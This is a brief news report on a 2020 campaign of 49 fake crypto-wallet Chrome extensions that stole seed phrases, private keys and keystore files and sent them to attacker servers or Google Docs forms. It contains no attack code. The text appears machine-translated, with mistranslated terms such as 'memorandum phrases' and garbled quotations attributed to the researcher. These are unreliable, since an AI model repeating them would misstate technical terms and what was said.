Researchers have noticed a huge campaign pushing fake browser extensions to users - including Google Chrome extensions - that mimic popular brands using Google Ads and other ad channels.
Extensions aim to steal memorandum phrases, private keys and Keystore files from users and send them to the attacker's server.
49 Chrome extensions were detected
Malicious encryption extensions were found by Harry Denley, Security Director at MyCrypto. They represent popular brands such as Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus and KeepKey.
As soon as the user enters secret keys with these fake extensions, then the extensions send a HTTP POST request to the C2 server controlled by the intruder.
Once the user enters the data, the secrets information sent to the server are controlled by intruders.
Most of the C2 servers were found to be registered between March and April 2020, the oldest of which is (ledger.productions).
Some of the extensions use phished data in a GoogleDocs form and some of the malicious extensions use their PHP scripts, the researchers said.
"Some of the extensions had a network of fake users evaluating the application with 5 stars and I was giving positive feedback on the extension to attract a user to download it. Most positive reviews from fake ones users was of low quality, such as "good", "useful application" or "legal extension".
All malicious extensions were reported by researchers on Google Webstore and were removed within 24 hours.
"An analysis of our data shows that the malicious expansions were slow Rhythms "In February 2020, they increased their traffic until March 2020, and then in April 2020, they increased their traffic a lot," said Harry Denley.
The attackers who abuse the Chrome store are not new, 500+ malicious Chrome extensions have recently been removed from the official Chrome Web Store.